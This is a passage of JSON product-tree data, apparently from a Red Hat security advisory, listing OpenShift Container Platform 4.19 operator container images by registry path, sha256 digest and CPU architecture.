"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le"
},
